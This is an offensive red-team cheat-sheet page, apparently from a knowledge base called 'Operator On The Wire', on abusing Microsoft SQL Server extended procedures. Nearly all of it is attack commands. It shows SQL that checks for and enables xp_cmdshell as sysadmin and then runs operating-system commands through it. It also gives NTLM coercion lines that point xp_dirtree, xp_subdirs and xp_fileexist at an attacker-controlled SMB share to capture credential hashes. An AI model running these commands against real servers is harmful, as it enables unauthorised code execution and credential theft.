Operator On The Wire· OOTW · 2026 ·

← Back to Knowledge Base

RED TEAM / SQL / MSSQL / EXECUTION

Extended-Procedures

Use when xp_cmdshell is enabled or you can enable it as sysadmin.

Identify

SELECT name,value_in_use FROM sys.configurations WHERE name='xp_cmdshell';

Enable

EXEC sp_configure 'show advanced options', 1; 
RECONFIGURE; 
EXEC sp_configure 'xp_cmdshell', 1; 
RECONFIGURE; 
xp_cmdshell 'whoami';

Execute

EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'dir C:\';

NTLM Coercion


-- SMB rogue server listening --

EXEC master..xp_dirtree '\\ATTACKER\\share\\ping';

EXEC master..xp_subdirs '\\ATTACKER\\share\\ping';

EXEC master..xp_fileexist '\\ATTACKER\\share\\ping';